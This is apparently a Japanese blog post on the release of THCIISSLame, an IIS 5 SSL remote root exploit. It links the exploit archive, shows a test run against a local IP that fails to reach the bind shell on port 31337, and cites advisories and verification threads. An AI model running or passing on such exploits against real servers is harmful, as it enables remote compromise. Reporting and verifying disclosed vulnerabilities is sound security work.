THCIISSLame 0.1 - IIS 5 SSL remote root exploitということでTHCよりリリース。寝ようと思ったらけんさんのところで発見(^^;　[Full-Disclosure]でも上がっていたが自宅には届いていない。最近メールが届かないなぁと思っていたけど...単なる遅延でなくてMLから除外されているのかなぁ。一時期サーバーが止まっていたらしいので。ちなみに攻撃に成功すると31337に接続できる模様。検証のモノは手抜きマシンなので...（汗

• THCIISSLame.zip

C:\temp>THCIISSLame.exe 192.168.1.15

THCIISSLame v0.1 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

[*] building buffer
[*] connecting the target
[*] Exploit send successfully ! Sleeping a while ....
[*] Trying to get a shell

can't connect to port 31337 ;( maybe firewalled ...

追記：↓検証結果が出てます。

• [Snort-users-jp:00933] Re: THCIISSLame　(日本語での検証結果)
• Windows製品群における複数の脆弱性について(IPA)
• ISS、1週間前に発見された脆弱性の攻撃コードが公開されていると警告(INTERNETWatch)
• Microsoft SSL ライブラリにおけるリモート セキュリティ侵害の脆弱点(ISSKK)